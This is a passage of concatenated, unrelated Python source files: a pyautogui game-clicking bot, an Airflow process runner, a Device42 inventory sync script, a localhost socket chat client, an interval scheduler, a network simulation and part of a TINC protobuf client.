lock.acquire()
print("idle1:", output)
lock.release()
if not output == None:
processIdleOutput(output)
def worker4(lock): #goods boxes icons
while True:
output = pyautogui.locateOnScreen('goods1.png', confidence=0.885)
lock.acquire()
print("goods1:", output)
lock.release()
if not output == None:
processIdleOutput(output)
def worker5(lock): #ingame buttons
suppressESC = False
while True:
output = pyautogui.locateOnScreen('button1.png', confidence=0.800, grayscale=True)
lock.acquire()
print("button1:", output)
lock.release()
if output == None:
output = pyautogui.locateOnScreen('button2.png', confidence=0.800, grayscale=True)
lock.acquire()
print("button2:", output)
lock.release()
if not output == None:
processButtonOutput(output, suppressESC)
else:
sleep(5)
#multithreading
if collectGold == True:
t1 = threading.Thread(target=worker1, args=(lock,))
t1.start()
if collectSupplies == True:
t2 = threading.Thread(target=worker2, args=(lock,))
t2.start()
if restartIdleBuildings == True:
t3 = threading.Thread(target=worker3, args=(lock,))
t3.start()
if collectGoods == True:
t4 = threading.Thread(target=worker4, args=(lock,))
t4.start()
if pressButtons == True:
t5 = threading.Thread(target=worker5, args=(lock,))
t5.start()
|
multi_process_runner.py
|
import logging
from multiprocessing.context import Process
from airflow_monitor.common import capture_monitor_exception
from airflow_monitor.multiserver.runners.base_runner import BaseRunner
logger = logging.getLogger(__name__)
class MultiProcessRunner(BaseRunner):
JOIN_TIMEOUT = 60
def __init__(self, target, **kwargs):
super(MultiProcessRunner, self).__init__(target, **kwargs)
self.process = None # type: Process
@capture_monitor_exception
def start(self):
self.process = Process(target=self.target, kwargs=self.kwargs)
self.process.start()
@capture_monitor_exception
def stop(self):
if self.process and self.is_alive():
self.process.terminate()
self.process.join(MultiProcessRunner.JOIN_TIMEOUT)
if self.process.is_alive():
self.process.kill()
@capture_monitor_exception
def heartbeat(self):
# do we want to do something here?
pass
@capture_monitor_exception
def is_alive(self):
return self.process.is_alive()
def __str__(self):
s = super(MultiProcessRunner, self).__str__()
return f"{s}({self.process})"
|
mod_d42.py
|
#!/usr/bin/env python
from requests import get as reqget, post as reqpost
from json import loads as jsonloads, dumps as jsondumps
from config import configSystem
from threading import Thread
from res_d42 import D42
import time, sys, os
cfg = configSystem('config.cfg')
# Override
#dccode = ''
dccode = cfg.getConfigValue('pdu', 'dccode')
d42obj = D42(
cfg.getConfigValue('device42', 'd42_api_base'),
cfg.getConfigValue('device42', 'd42_user'),
cfg.getConfigValue('device42', 'd42_pass')
)
#pdudata = d42obj.api_get('/pdus/')['pdus']
def scanner(indata):
if 'serial_number' not in indata:
return False
serial = indata['serial_number']
if 'd42_id' in indata:
if indata['d42_id'] == 0:
return True
updateData = {
# 'name': indata['d42_name'],
'new_name': indata['hostname'],
'asset_no': indata['asset_tag'],
'device_id': indata['d42_id'],
'serial_no': indata['serial_number'],
}
respdevdata = d42obj.api_put('/device/', updateData)
print updateData
print respdevdata
updatePduData = {
'pdu_id': indata['pdu_id'],
'name': indata['hostname'],
'asset_no': indata['asset_tag'],
}
resppdudata = d42obj.api_put('/pdus/', updatePduData)
print updatePduData
print resppdudata
exit()
respdata = d42obj.api_get('/devices/all/?limit=50&serial_no=%s' % serial)
if respdata['total_count'] > 0 and len(respdata['Devices']) > 0:
matched = True
matchedObj = respdata['Devices'][0]
if matched:
print 'Found S/N in D42: %s' % serial
data = {
'd42_pdu_mapping_url': matchedObj['pdu_mapping_url'],
'd42_id': matchedObj['device_id'],
'd42_name': matchedObj['name'],
'real_serial': serial,
}
url = '%s/pdu/update' % cfg.getConfigValue('pdu', 'api_base')
r = reqpost(url, headers={'SB-Auth-Key': cfg.getConfigValue('pdu', 'api_key')}, json=data)
try:
print r.json()
except ValueError:
print r.text
else:
print 'S/N not found in D42: %s' % serial
data = {
'd42_pdu_mapping_url': '',
'd42_id': '',
'd42_name': '',
'real_serial': serial,
}
url = '%s/pdu/update' % cfg.getConfigValue('pdu', 'api_base')
r = reqpost(url, headers={'SB-Auth-Key': cfg.getConfigValue('pdu', 'api_key')}, json=data)
try:
print r.json()
except ValueError:
print r.text
exit()
url = '%s/pdu/getPduData?dccode=%s¶ms=d42_id,serial_number,hostname,d42_name,pdu_id,pdu_name,asset_tag' % (cfg.getConfigValue('pdu', 'api_base'), dccode)
r = reqget(url, headers={'SB-Auth-Key': cfg.getConfigValue('pdu', 'api_key')})
resp = r.json()
if 'data' not in resp:
exit()
for data in resp['data']:
if len(data['serial_number']) > 0:
scanner(data)
# t = Thread(target=scanner, args=(data,))
# t.start()
|
client.py
|
import socket
from threading import Thread
class Client:
def __init__(self, server_host="127.0.0.1", server_port=5002, message_size=1024):
"""クライアントです。
Parameters
----------
server_host : str
接続先サーバーのホスト名、またはIPアドレスです。 規定値 "127.0.0.1"
server_port : int
接続先サーバーのポート番号です。 規定値 5002
message_size : int
1回の通信で送れるバイト長。 規定値 1024
"""
self._s_host = server_host
self._s_port = server_port
self._message_size = message_size
# '_s_sock' - (Server socket) 接続先サーバーのソケットです
self._s_sock = None
# '_s_thr' - (Server thread) サーバーからのメッセージを受信するスレッド
self._s_thr = None
# サーバースレッドが終了したら、メインスレッドも終了させるのに使います
self._is_terminate_server_thread = False
def clean_up(self):
# サーバーのソケットを閉じます
self._s_sock.close()
# 実行中のスレッドがあれば終了するまで待機するのがクリーンです
if not (self._s_thr is None) and self._s_thr.is_alive():
print("[CleanUp] Before join")
self._s_thr.join()
print("[CleanUp] After join")
self._s_thr = None
def run(self):
def server_worker():
while True:
try:
message = self._s_sock.recv(self._message_size).decode()
print("\n" + message)
if message == "quit":
# サーバーから quit が送られてきたら終了することにします
# サーバーから強制的に切断しても同じですが、エラーメッセージが出ないという違いがあります
# TODO ただし、このワーカースレッドが止まっても、標準入力の待機からは自動的には抜けません
print(f"""[-] Disconnected by server.""")
self._is_terminate_server_thread = True
return
except Exception as e:
# client no longer connected
# remove it from the set
print(f"[!] Error: {e}")
print(
f"""Finished listening to the server.
Please push q key to quit."""
)
self._is_terminate_server_thread = True
return
# initialize TCP socket
self._s_sock = socket.socket()
# connect to the server
print(f"[*] Connecting to {self._s_host}:{self._s_port}...")
self._s_sock.connect((self._s_host, self._s_port))
print("[+] Connected.")
# make a thread that listens for messages to this client & print them
self._s_thr = Thread(target=server_worker)
# make the thread daemon so it ends whenever the main thread ends
self._s_thr.daemon = True
# start the thread
self._s_thr.start()
while not self._is_terminate_server_thread:
# input message we want to send to the server
to_send = input() # ここでブロックします。このブロックをプログラムから解除する簡単な方法はありません
# a way to exit the program
if to_send.lower() == "q":
break
to_send = f"{to_send}"
# finally, send the message
self._s_sock.send(to_send.encode())
|
interval_scheduler.py
|
# XXX Rename this to "interval_scheduler.py" and delete the old file after this is confirmed to work for both async and regula routines
# XXX Rename this class to represent running the same routine to run in an interval
from datetime import timedelta
from types import coroutine
from typing import Callable, Coroutine
import sched
import threading
import time
import logging
import asyncio
class IntervalScheduler:
"""
Runs a routine at an interval out of the calling thread
"""
HIGH_PRIORITY = 0
def __init__(self, routine: Callable, interval: timedelta, logger=logging):
self.routine = routine
self.interval_seconds = interval.total_seconds()
self.t_helper = threading.Thread(target=self.__run)
self.should_exit = False
self.logger = logger
self._has_finished = False
def __run(self):
"""
The core logic of the scheduler that also calls the scheduler's routine.
"""
asyncio.run(self.__loop())
async def __loop(self):
while not self.should_exit:
result = self.routine()
if asyncio.iscoroutine(result):
await result
await asyncio.sleep(self.interval_seconds)
self._has_finished = True
self.logger.info("Scheduler exited succesfully!")
def start(self):
self.t_helper.start()
def stop(self):
self.should_exit = True
def has_finished(self):
return self._has_finished
def running(self):
"""
Returns whether start() has been called before a stop()
"""
return self.t_helper.is_alive()
# I used this as a manual test since it was quicker than writing unit-tests. HarHarHar
if __name__ == "__main__":
squak = lambda: print("Caaw!")
scheduler = IntervalScheduler(
routine=squak, interval=timedelta(seconds=1)
)
scheduler.start()
|
simulation.py
|
'''
Created on Oct 12, 2016
@author: mwittie
'''
import network_1
import link
import threading
from time import sleep
##configuration parameters
router_queue_size = 0 #0 means unlimited
simulation_time = 1 #give the network sufficient time to transfer all packets before quitting
if __name__ == '__main__':
object_L = [] #keeps track of objects, so we can kill their threads
#create network nodes
client = network_1.Host(1)
object_L.append(client)
server = network_1.Host(2)
object_L.append(server)
router_a = network_1.Router(name='A', intf_count=1, max_queue_size=router_queue_size)
object_L.append(router_a)
#create a Link Layer to keep track of links between network nodes
link_layer = link.LinkLayer()
object_L.append(link_layer)
#add all the links
#link parameters: from_node, from_intf_num, to_node, to_intf_num, mtu
link_layer.add_link(link.Link(client, 0, router_a, 0, 50))
link_layer.add_link(link.Link(router_a, 0, server, 0, 50))
#start all the objects
thread_L = []
thread_L.append(threading.Thread(name=client.__str__(), target=client.run))
thread_L.append(threading.Thread(name=server.__str__(), target=server.run))
thread_L.append(threading.Thread(name=router_a.__str__(), target=router_a.run))
thread_L.append(threading.Thread(name="Network", target=link_layer.run))
for t in thread_L:
t.start()
#create some send events
for i in range(3):
client.udt_send(2, 'Sample data %d' % i)
#give the network sufficient time to transfer all packets before quitting
sleep(simulation_time)
#join all threads
for o in object_L:
o.stop = True
for t in thread_L:
t.join()
print("All simulation threads joined")
# writes to host periodically
|
tinc_client.py
|
from enum import auto
import threading
import time
import socket
from tinc.variant import VariantType
from typing import List, Any
import struct
import socket # For gethostname()
from threading import Lock
# TINC imports
from .parameter import Parameter, ParameterString, ParameterInt, ParameterChoice, ParameterBool, ParameterColor, Trigger, ParameterVec
from .processor import ProcessorCpp, ProcessorScript, ComputationChain
from .datapool import DataPool
from .parameter_space import ParameterSpace
from .disk_buffer import *
from .cachemanager import *
from .message import Message
from . import tinc_protocol_pb2 as TincProtocol
#from google.protobuf import any_pb2 #, message
tinc_client_version = 1
tinc_client_revision = 0
commands = {
"HANDSHAKE" : 0x01,
"HANDSHAKE_ACK" : 0x02,
"GOODBYE" : 0x03,
"GOODBYE_ACK" : 0x04,
"PING" : 0x05,
"PONG" : 0x06,
}
class TincTimeout(ValueError):
def __init__(self, arg):
self.strerror = arg
self.args = {arg}
class TincClient(object):
def __init__(self, server_addr: str = "localhost",
server_port: int = 34450, auto_connect = True):
self.connected = False
self.parameters = []
self.processors = []
self.datapools = []
self.disk_buffers = []
self.parameter_spaces = []
self.request_timeout = 10.0
self.pending_requests = {}
self.pending_requests_count = 1
self.pending_replies = {}
self.request_count_lock = Lock()
self.pending_requests_lock = Lock()
self.pending_lock = Lock()
self._barrier_queues_lock = Lock()
self._barrier_requests = []
self._barrier_unlocks = []
self.barrier_wait_granular_time_ms = 20
self.server_version = 0
self.server_revision = 0
self._log = []
self.debug = False
self._server_status = TincProtocol.StatusTypes.UNKNOWN
if auto_connect:
self.start(server_addr, server_port)
def __del__(self):
self.stop()
print("Stopped")
def start(self, server_addr = "localhost", server_port = 34450):
# self.pserver = pserver
self.serverAddr = server_addr
self.serverPort = server_port
self.running = True
self.x = threading.Thread(target=self._server_thread_function, args=(self.serverAddr,self.serverPort))
self.x.start()
def stop(self):
if self.running:
self.send_goodbye()
self.running = False
self.connected = False
self.x.join()
self.socket.close()
self.socket = None
self.server_version = 0
self.server_revision = 0
def server_status(self):
return self._server_status
def barrier(self, group = 0, timeout_sec = 0):
with self._barrier_queues_lock:
# first flush all requests that match unlocks
matched_unlocks = []
for unlock in self._barrier_unlocks:
if self._barrier_requests.count(unlock) > 0:
self._barrier_requests.remove(unlock)
matched_unlocks.append(unlock)
for matched in matched_unlocks:
if self._barrier_unlocks.count(matched) > 0:
self._barrier_requests.remove(matched)
print("-----",len(self._barrier_requests))
if len(self._barrier_requests) > 1:
print("Unexpected inconsistent state in barrier. Aborting and flushing barriers.")
self._barrier_requests.clear()
self._barrier_unlocks.clear()
return False
timems = 0.0
current_consecutive = 0
while timems < (timeout_sec * 1000) or timeout_sec == 0:
if (self._barrier_queues_lock.acquire(False)):
if len(self._barrier_requests) > 0:
current_consecutive = self._barrier_requests[0]
msg = TincProtocol.TincMessage()
msg.messageType = TincProtocol.BARRIER_ACK_LOCK
msg.objectType = TincProtocol.GLOBAL
comm = TincProtocol.Command()
comm.message_id = current_consecutive
msg.details.Pack(comm)
self._send_message(msg)
self._barrier_requests.remove(current_consecutive)
self._barrier_queues_lock.release()
break
self._barrier_queues_lock.release()
time.sleep(self.barrier_wait_granular_time_ms* 0.001)
timems += self.barrier_wait_granular_time_ms
if timems > (timeout_sec * 1000) and timeout_sec != 0.0:
# Timeout.
return False
# Now wait for unlock
timems = 0.0
while timems < (timeout_sec * 1000) or timeout_sec == 0:
if (self._barrier_queues_lock.acquire(False)):
if self._barrier_unlocks.count(current_consecutive) > 0:
self._barrier_unlocks.remove(current_consecutive)
self._barrier_queues_lock.release()
break
self._barrier_queues_lock.release()
time.sleep(self.barrier_wait_granular_time_ms* 0.001)
timems += self.barrier_wait_granular_time_ms
print("Exit client barrier")
return timems < (timeout_sec * 1000) or timeout_sec == 0
def wait_for_server_available(self, timeout = 3000.0):
time_count = 0.0
wait_granularity = 0.1
while self._server_status != TincProtocol.StatusTypes.AVAILABLE:
time.sleep(wait_granularity)
time_count += wait_granularity
if time_count > timeout:
raise TincTimeout("Server still busy after timeout")
# Access to objects by id
def get_parameter(self, parameter_id, group = None):
for p in self.parameters:
if p.id == parameter_id and group is None:
return p
elif p.id == parameter_id and p.group == group:
return p
return None
def get_parameters(self, group = None):
params = []
for p in self.parameters:
if group is None or p.group == group:
params.append(p)
return params
def get_processor(self, processor_id):
for p in self.processors:
if p.id == processor_id:
return p
return None
def get_disk_buffer(self, db_id):
for db in self.disk_buffers:
if db.id == db_id:
return db
return None
def get_datapool(self, datapool_id):
for dp in self.datapools:
if dp.id == datapool_id:
return dp
return None
def get_parameter_space(self, ps_id):
for ps in self.parameter_spaces:
if ps.id == ps_id:
return ps
return None
# Network message handling
def create_parameter(self, parameter_type, param_id, group = None, min_value = None, max_value = None, space = None, default_value= None, space_representation_type = None):
new_param = parameter_type(param_id, group, default_value = default_value, tinc_client = self)
new_param = self.register_parameter(new_param)
if not min_value is None:
# avoid callbacks
new_param._minimum = min_value
if not max_value is None:
# avoid callbacks
new_param._maximum = max_value
if not space_representation_type is None:
new_param.space_representation_type = space_representation_type
if type(space) == dict:
new_param.ids = space.values()
new_param.values = space.keys()
elif type(space) == list:
new_param.ids = []
new_param.values = space
if self.connected:
self._register_parameter_on_server(new_param)
self.send_parameter_meta(new_param)
return new_param
def remove_parameter(self, param_id, group = None):
if not type(param_id) == str:
group = param_id.group
param_id = param_id.id
# TODO complete implementation
return
def register_parameter(self, new_param):
for p in self.parameters:
if p.id == new_param.id and p.group == new_param.group:
if self.debug:
print(f"Parameter already registered: {new_param.id}")
return p
self.parameters.append(new_param)
return new_param
def send_parameter_value(self, param):
if not self.connected:
return
msg = TincProtocol.TincMessage()
msg.messageType = TincProtocol.CONFIGURE
msg.objectType = TincProtocol.PARAMETER
config = TincProtocol.ConfigureParameter()
config.id = param.get_osc_address()
config.configurationKey = TincProtocol.ParameterConfigureType.VALUE
value = TincProtocol.ParameterValue()
# TODO implement all types
if type(param) == Parameter:
value.valueFloat = param.value
elif type(param) == ParameterString:
value.valueString = param.value
elif type(param) == ParameterChoice:
value.valueUint64 = param.value
elif type(param) == ParameterInt:
value.valueInt32 = param.value
elif type(param) == ParameterColor:
r = TincProtocol.ParameterValue()
g = TincProtocol.ParameterValue()
b = TincProtocol.ParameterValue()
a = TincProtocol.ParameterValue()
r.valueFloat = param.value[0]
g.valueFloat = param.value[1]
b.valueFloat = param.value[2]
a.valueFloat = param.value[3]
value.valueList.extend([r,g,b,a])
elif type(param) == ParameterVec:
for v in param.value:
v_ = TincProtocol.ParameterValue()
v_.valueFloat = v
value.valueList.extend([v_])
elif type(param) == ParameterBool or type(param) == Trigger:
value.valueBool = param.value
config.configurationValue.Pack(value)
msg.details.Pack(config)
self._send_message(msg)
def send_parameter_meta(self, param, fields = None):
if fields is None:
fields = ("minimum", "maximum", "space", "space_representation_type")
# Minimum
if "minimum" in fields:
msg = TincProtocol.TincMessage()
msg.messageType = TincProtocol.CONFIGURE
msg.objectType = TincProtocol.PARAMETER
config = TincProtocol.ConfigureParameter()
config.id = param.get_osc_address()
config.configurationKey = TincProtocol.ParameterConfigureType.MIN
value = TincProtocol.ParameterValue()
# TODO implement all types
if type(param) == Parameter:
value.valueFloat = param.minimum
config.configurationValue.Pack(value)
msg.details.Pack(config)
self._send_message(msg)
elif type(param) == ParameterString:
pass
elif type(param) == ParameterChoice:
value.valueUint64 = param.minimum
config.configurationValue.Pack(value)
msg.details.Pack(config)
self._send_message(msg)
elif type(param) == ParameterInt:
value.valueInt32 = param.minimum
config.configurationValue.Pack(value)
msg.details.Pack(config)
self._send_message(msg)
elif type(param) == ParameterColor:
pass
elif type(param) == ParameterBool or type(param) == Trigger:
pass
if "maximum" in fields:
msg = TincProtocol.TincMessage()
msg.messageType = TincProtocol.CONFIGURE
msg.objectType = TincProtocol.PARAMETER
config = TincProtocol.ConfigureParameter()
config.id = param.get_osc_address()
config.configurationKey = TincProtocol.ParameterConfigureType.MAX
value = TincProtocol.ParameterValue()
# TODO implement all types
if type(param) == Parameter:
value.valueFloat = param.maximum
config.configurationValue.Pack(value)
msg.details.Pack(config)
self._send_message(msg)
elif type(param) == ParameterString:
pass
elif type(param) == ParameterChoice:
value.valueUint32 = param.maximum
config.configurationValue.Pack(value)
msg.details.Pack(config)
self._send_message(msg)
elif type(param) == ParameterInt:
value.valueInt32 = param.maximum
config.configurationValue.Pack(value)
msg.details.Pack(config)
self._send_message(msg)
elif type(param) == ParameterColor:
pass
elif type(param) == ParameterBool or type(param) == Trigger:
pass
if "space_representation_type" in fields:
self.send_parameter_space_type(param)
if "space" in fields:
self.send_parameter_space(param)
def send_parameter_space_type(self, param):
msg = TincProtocol.TincMessage()
msg.messageType = TincProtocol.CONFIGURE
msg.objectType = TincProtocol.PARAMETER
config = TincProtocol.ConfigureParameter()
config.id = param.get_osc_address()
config.configurationKey = TincProtocol.ParameterConfigureType.SPACE_TYPE
type_value = TincProtocol.ParameterValue()
type_value.valueInt32 = int(param.space_representation_type)
config.configurationValue.Pack(type_value)
msg.details.Pack(config)
self._send_message(msg)
def send_parameter_space(self, param):
if not self.connected:
return
msg = TincProtocol.TincMessage()
msg.messageType = TincProtocol.CONFIGURE
msg.objectType = TincProtocol.PARAMETER
config = TincProtocol.ConfigureParameter()
config.id = param.get_osc_address()
config.configurationKey = TincProtocol.ParameterConfigureType.SPACE
space_values = TincProtocol.ParameterSpaceValues()
if len(param.ids) != len(param.values) and len(param.ids) != 0:
print("ERROR parameter ids-values mismatch, not sending to remote")
return
# TODO implement all types
if type(param) == Parameter:
packed_vals = []
for v in param.values:
new_val = TincProtocol.ParameterValue()
new_val.valueFloat = v
packed_vals.append(new_val)
if len(param.ids) > 0:
space_values.ids.extend(param.ids)
space_values.values.extend(packed_vals)
config.configurationValue.Pack(space_values)
msg.details.Pack(config)
self._send_message(msg)
elif type(param) == ParameterString:
pass
elif type(param) == ParameterChoice:
pass
elif type(param) == ParameterInt:
packed_vals = []
for v in param.values:
new_val = TincProtocol.ParameterValue()
new_val.valueInt32 = int(v)
packed_vals.append(new_val)
space_values.ids.extend(param.ids)
space_values.values.extend(packed_vals)
config.configurationValue.Pack(space_values)
msg.details.Pack(config)
self._send_message(msg)
elif type(param) == ParameterColor:
pass
elif type(param) == ParameterBool or type(param) == Trigger:
pass
def _register_parameter_on_server(self, param):
details = TincProtocol.RegisterParameter()
details.id = param.id
details.group = param.group
if type(param) == Parameter:
details.dataType = TincProtocol.PARAMETER_FLOAT
details.defaultValue.valueFloat = param.default
if type(param) == ParameterString:
details.dataType = TincProtocol.PARAMETER_STRING
details.defaultValue.valueString = param.default
if type(param) == ParameterInt:
details.dataType = TincProtocol.PARAMETER_INT32
details.defaultValue.valueInt32 = param.default
if type(param) == ParameterChoice:
details.dataType = TincProtocol.PARAMETER_CHOICE
details.defaultValue.valueUint64 = param.default
if type(param) == ParameterBool:
details.dataType = TincProtocol.PARAMETER_BOOL
details.defaultValue.valueBool = param.default
if type(param) == Trigger:
details.dataType = TincProtocol.PARAMETER_TRIGGER
details.defaultValue.valueBool = False
msg = TincProtocol.TincMessage()
msg.messageType = TincProtocol.MessageType.REGISTER
msg.objectType = TincProtocol.ObjectType.PARAMETER
msg.details.Pack(details)
self._send_message(msg)
def _register_parameter_from_message(self, details):
if details.Is(TincProtocol.RegisterParameter.DESCRIPTOR):
details_unpacked = TincProtocol.RegisterParameter()
details.Unpack(details_unpacked)
name = details_unpacked.id
group = details_unpacked.group
param_type = details_unpacked.dataType
if self.debug:
print(f"Register parameter {name} {group} {param_type}")
if param_type == TincProtocol.PARAMETER_FLOAT :
new_param = Parameter(name, group, default_value = details_unpacked.defaultValue.valueFloat, tinc_client =self)
elif param_type == TincProtocol.PARAMETER_BOOL:
new_param = ParameterBool(name, group, default_value = details_unpacked.defaultValue.valueBool, tinc_client =self)
elif param_type == TincProtocol.PARAMETER_STRING :
new_param = ParameterString(name, group, default_value = details_unpacked.defaultValue.valueString, tinc_client =self)
elif param_type == TincProtocol.PARAMETER_INT32 :
new_param = ParameterInt(name, group, default_value = details_unpacked.defaultValue.valueInt32, tinc_client =self)
elif param_type == TincProtocol.PARAMETER_VEC3F :
new_param = ParameterVec(name, group, 3, tinc_client=self)
elif param_type == TincProtocol.PARAMETER_VEC4F :
new_param = ParameterVec(name, group, 4, tinc_client=self)
elif param_type == TincProtocol.PARAMETER_COLORF :
l = [v.valueFloat for v in details_unpacked.defaultValue.valueList]
new_param = ParameterColor(name, group, default_value = l, tinc_client =self)
elif param_type == TincProtocol.PARAMETER_POSED :
new_param = None
pass
elif param_type == TincProtocol.PARAMETER_MENU :
#new_param = ParameterM(name, group, default_value = details_unpacked.defaultValue.valueUint64, tinc_client =self)
new_param = None
pass
elif param_type == TincProtocol.PARAMETER_CHOICE :
new_param = ParameterChoice(name, group, default_value = details_unpacked.defaultValue.valueUint64, tinc_client =self)
pass
elif param_type == TincProtocol.PARAMETER_TRIGGER :
new_param = Trigger(name, group)
pass
elif param_type == TincProtocol.PARAMETER_INT64 :
#new_param = ParameterM(name, group, default_value = details_unpacked.defaultValue.valueUint64, tinc_client =self)
new_param = None
pass
elif param_type == TincProtocol.PARAMETER_INT16 :
#new_param = ParameterM(name, group, default_value = details_unpacked.defaultValue.valueUint64, tinc_client =self)
new_param = None
pass
elif param_type == TincProtocol.PARAMETER_INT8 :
#new_param = ParameterM(name, group, default_value = details_unpacked.defaultValue.valueUint64, tinc_client =self)
new_param = None
pass
elif param_type == TincProtocol.PARAMETER_UINT64 :
#new_param = ParameterM(name, group, default_value = details_unpacked.defaultValue.valueUint64, tinc_client =self)
new_param = None
pass
elif param_type == TincProtocol.PARAMETER_UINT32 :
#new_param = ParameterM(name, group, default_value = details_unpacked.defaultValue.valueUint64, tinc_client =self)
new_param = None
pass
elif param_type == TincProtocol.PARAMETER_UINT16 :
#new_param = ParameterM(name, group, default_value = details_unpacked.defaultValue.valueUint64, tinc_client =self)
new_param = None
pass
elif param_type == TincProtocol.PARAMETER_UINT8 :
#new_param = ParameterM(name, group, default_value = details_unpacked.defaultValue.valueUint64, tinc_client =self)
new_param = None
pass
elif param_type == TincProtocol.PARAMETER_DOUBLE :
#new_param = ParameterM(name, group, default_value = details_unpacked.defaultValue.valueUint64, tinc_client =self)
new_param = None
pass
else:
new_param = None
if new_param:
self.register_parameter(new_param)
if self.debug:
print("Parameter already registered.")
else:
print(f"Unsupported parameter type for id: {name} group: {group}")
else:
print("ERROR: Unexpected payload in REGISTER PARAMETER")
def _configure_parameter_from_message(self, details):
if not details.Is(TincProtocol.ConfigureParameter.DESCRIPTOR):
print("ERROR unexpected paylod in Configure parameter. Aborting.")
return
param_details = TincProtocol.ConfigureParameter()
details.Unpack(param_details)
param_osc_address = param_details.id
param_command = param_details.configurationKey
configured = True
if self.debug:
print(f"_configure_parameter_from_message {param_osc_address} {param_command}")
for param in self.parameters:
if param.get_osc_address() == param_osc_address:
if param_command == TincProtocol.ParameterConfigureType.VALUE:
configured = configured and param.set_value_from_message(param_details.configurationValue)
elif param_command == TincProtocol.ParameterConfigureType.MIN:
configured = configured and param.set_min_from_message(param_details.configurationValue)
elif param_command == TincProtocol.ParameterConfigureType.MAX:
configured = configured and param.set_max_from_message(param_details.configurationValue)
elif param_command == TincProtocol.ParameterConfigureType.SPACE:
configured = configured and param.set_space_from_message(param_details.configurationValue)
elif param_command == TincProtocol.ParameterConfigureType.SPACE_TYPE:
configured = configured and param.set_space_representation_type_from_message(param_details.configurationValue)
else:
print("Unrecognized Parameter Configure command")
if self.debug:
print("_configure_parameter_from_message done")
if not configured:
print("Parameter configuration failed")
# ParameterSpace messages ------------------
def register_parameter_space(self, new_ps):
found = False
for ps in self.parameter_spaces:
if ps.id == new_ps.id:
if self.debug:
print(f"ParameterSpace already registered: '{new_ps.id}'")
found = True
break
if not found:
self.parameter_spaces.append(new_ps)
#print(f"REGISTER ParameterSpace: '{new_ps}'")
def _register_parameter_space_from_message(self, details):
# print('register ps')
if details.Is(TincProtocol.RegisterParameterSpace.DESCRIPTOR):
ps_details = TincProtocol.RegisterParameterSpace()
details.Unpack(ps_details)
ps_id = ps_details.id
self.register_parameter_space(ParameterSpace(ps_id, tinc_client = self))
def _configure_parameter_space_from_message(self, details):
param_details = TincProtocol.ConfigureParameterSpace()
details.Unpack(param_details)
ps_id = param_details.id
configured = True
if self.debug:
print("Processing _configure_parameter_space_from_message")
for ps in self.parameter_spaces:
if ps_id == ps.id:
ps_command = param_details.configurationKey
if ps_command == TincProtocol.ParameterSpaceConfigureType.ADD_PARAMETER:
param_value = TincProtocol.ParameterValue()
param_details.configurationValue.Unpack(param_value)
param_id = param_value.valueString
for p in self.parameters:
if p.get_osc_address() == param_id:
if self.debug:
print(f"Registering {param_id} for {ps}")
ps.register_parameter(p)
configured = True
break
elif ps_command == TincProtocol.ParameterSpaceConfigureType.REMOVE_PARAMETER:
param_value = TincProtocol.ParameterValue()
param_details.configurationValue.Unpack(param_value)
param_id = param_value.valueString
for p in self.parameters:
if p.get_osc_address() == param_id:
ps.remove_parameter(p)
configured = True
break
elif ps_command == TincProtocol.ParameterSpaceConfigureType.CURRENT_TEMPLATE:
template_val = TincProtocol.ParameterValue()
param_details.configurationValue.Unpack(template_val)
if template_val.nctype == VariantType.VARIANT_STRING:
# Use internal member to avoid checks and warnings in the setter function
ps._path_template = template_val.valueString
else:
print("ERROR: Unexpected data type for TincProtocol.ParameterSpaceConfigureType.CURRENT_TEMPLATE")
elif ps_command == TincProtocol.ParameterSpaceConfigureType.ROOT_PATH:
root_value = TincProtocol.ParameterValue()
param_details.configurationValue.Unpack(root_value)
if root_value.nctype == VariantType.VARIANT_STRING:
# Use internal member to avoid checks and warnings in the setter function
ps._local_root_path = root_value.valueString
else:
print("ERROR: Unexpected data type for TincProtocol.ParameterSpaceConfigureType.ROOT_PATH")
elif ps_command == TincProtocol.ParameterSpaceConfigureType.CACHE_PATH:
dist_path = TincProtocol.DistributedPath()
param_details.configurationValue.Unpack(dist_path)
if ps._cache_manager is None:
ps._cache_manager = CacheManager(dist_path.relativePath)
if dist_path.filename != ps._cache_manager._metadata_file:
print(f"Unexpected cache filename: {dist_path.filename}. Expected: {ps._cache_manager._metadata_file}")
ps._cache_manager._cache_root = dist_path.rootPath
ps._cache_manager._cache_dir = dist_path.relativePath
ps._cache_manager._metadata_file = dist_path.filename
else:
ps._cache_manager._cache_root = dist_path.rootPath
ps._cache_manager._cache_dir = dist_path.relativePath
ps._cache_manager._metadata_file = dist_path.filename
else:
print("Unrecognized ParameterSpace Configure command " + str(ps_command))
if not configured:
print("ParameterSpace configuration failed")
def register_processor(self, message):
if message.Is(TincProtocol.RegisterProcessor.DESCRIPTOR):
proc_details = TincProtocol.RegisterProcessor()
message.Unpack(proc_details)
processor_type = proc_details.type
proc_id = proc_details.id
# print(name)
input_dir = proc_details.inputDirectory
# print(input_dir)
input_files = proc_details.inputFiles
# print(input_files)
output_dir = proc_details.outputDirectory
# print(output_dir)
output_files = proc_details.outputFiles
# print(output_files)
running_dir = proc_details.runningDirectory
# print(running_dir)
if processor_type == TincProtocol.CPP:
new_processor = ProcessorCpp(proc_id, input_dir, input_files, output_dir, output_files, running_dir)
elif processor_type == TincProtocol.DATASCRIPT:
new_processor = ProcessorScript(proc_id, input_dir, input_files, output_dir, output_files, running_dir)
elif processor_type == TincProtocol.CHAIN:
new_processor = ComputationChain(proc_id, input_dir, input_files, output_dir, output_files, running_dir)
else:
new_processor = None
print(f"Unexpected processor type {processor_type}")
found = False
for proc in self.processors:
if proc.id == proc_id:
if type(proc).__name__ == type(new_processor).__name__:
proc.id = proc_id
proc.input_dir = input_dir
proc.output_dir = output_dir
proc.running_dir = running_dir
print(f"Updated processor '{proc_id}'")
found = True
break
else:
print(f"ERROR processor type mismatch! {proc_id}")
if not found and new_processor:
self.processors.append(new_processor)
#print(f"Registered processor '{proc_id}'")
else:
print("Unexpected payload in Register Processor")
def configure_processor(self, details):
if details.Is(TincProtocol.ConfigureProcessor.DESCRIPTOR):
proc_details = TincProtocol.ConfigureProcessor()
details.Unpack(proc_details)
proc_id= proc_details.id
count = proc_details.configurationKey
for proc in self.processors:
if proc.id == proc_id:
proc.configuration.update({proc_details.configurationKey: proc_details.configurationValue})
def processor_update(self, client_address: str , address: str, *args: List[Any]):
name = args[0]
config_key = args[1]
config_value = args[2]
for proc in self.processors:
if proc.id == name:
proc.configuration[config_key] = config_value
print(f"Config [{config_key}] = {config_value}")
def _register_datapool_from_message(self, details):
if details.Is(TincProtocol.RegisterDataPool.DESCRIPTOR):
dp_details = TincProtocol.RegisterDataPool()
details.Unpack(dp_details)
dp_id = dp_details.id
ps_id = dp_details.parameterSpaceId
